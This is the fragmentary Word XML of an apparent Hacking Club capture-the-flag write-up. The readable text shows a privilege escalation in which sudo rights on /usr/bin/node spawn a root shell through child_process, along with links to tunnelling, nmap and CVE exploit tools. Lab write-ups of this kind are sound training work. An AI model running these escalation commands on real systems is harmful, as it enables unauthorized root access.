    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012D">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result=$(echo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/usr/bin/bash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/usr/bin/safe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2&gt;&amp;1)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012E">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F">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tl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000130">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break</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000131">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fi</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000132">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done</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000133">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:jc w:val="both"/>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4">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$max_length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tl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000135">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ab/>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maximum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($max_length).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Stopping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infinite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tl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000136">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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000137">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59100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="162" name="image46.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image46.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId62"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2959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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="165"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5943600" cy="1905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user’s password obtained, it was possible to execute the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/node</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with elevated privileges, allowing root access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013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77900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="166"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5943600" cy="977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the required command was executed to obtain </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000140">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1">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/usr/bin/node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'require("child_process").spawn("/bin/sh",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{stdio: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142">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70000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="168"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5943600" cy="127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successfully obtained the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root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14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400675" cy="1104900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="171" name="image40.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image40.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId66"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400675" cy="1104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8">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId67" w:type="default"/>
      <w:headerReference r:id="rId68" w:type="first"/>
      <w:headerReference r:id="rId69" w:type="even"/>
      <w:footerReference r:id="rId70" w:type="default"/>
      <w:footerReference r:id="rId71" w:type="first"/>
      <w:footerReference r:id="rId72"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 w:name="IBM Plex Sans SemiBold">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widowControl w:val="0"/>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="-1276" w:right="289"/>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2025 Hacking Club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4A">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.9ayk3x7hdiy4" w:id="4"/>
    <w:bookmarkEnd w:id="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145" name="image50.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image50.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14B">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14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153" name="image27.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image2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15679"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="124"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Like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15679"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="124" name="image56.png"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr id="0" name="image56.png"/>
                      <pic:cNvPicPr preferRelativeResize="0"/>
                    </pic:nvPicPr>
                    <pic:blipFill>
                      <a:blip r:embed="rId2"/>
                      <a:srcRect/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </pic:blipFill>
                    <pic:spPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="6686550" cy="3015679"/>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8.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jpillora/chisel" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.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14.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.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hackingclub.com/laboratory/competition-machines/290#" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://discord.com/channels/705946302105649153/1173705871046475796" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image58.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/nmap" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.png"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.png"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image59.png"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.png"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.png"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/j4k0m/CVE-2018-18925" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image57.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.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1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-bold.ttf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-regular.ttf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-boldItalic.ttf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemi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0.jpg"/><Relationship Id="rId2"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56.png"/></Relationships>
</file>

<file path=word/_rels/header3.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kfJuYrI4Lp+vsY7SJOJc1LRCVQ==">CgMxLjAaIwoBMBIeChwIB0IYCgtSb2JvdG8gTW9ubxIJTm92YSBNb25vMg1oLjk5ejZtemh3ZHlvMg5oLjJqZGYzNmNrMWkwcDIOaC5xeGluNDg5OWg4aXkyDmgucnJkY3h3ODR1aDVvMg5oLjlheWszeDdoZGl5NDgAciExZkM3OExLSHZrajJmdFc4VFZyRkI2RzlTTUI1Rm16NjY=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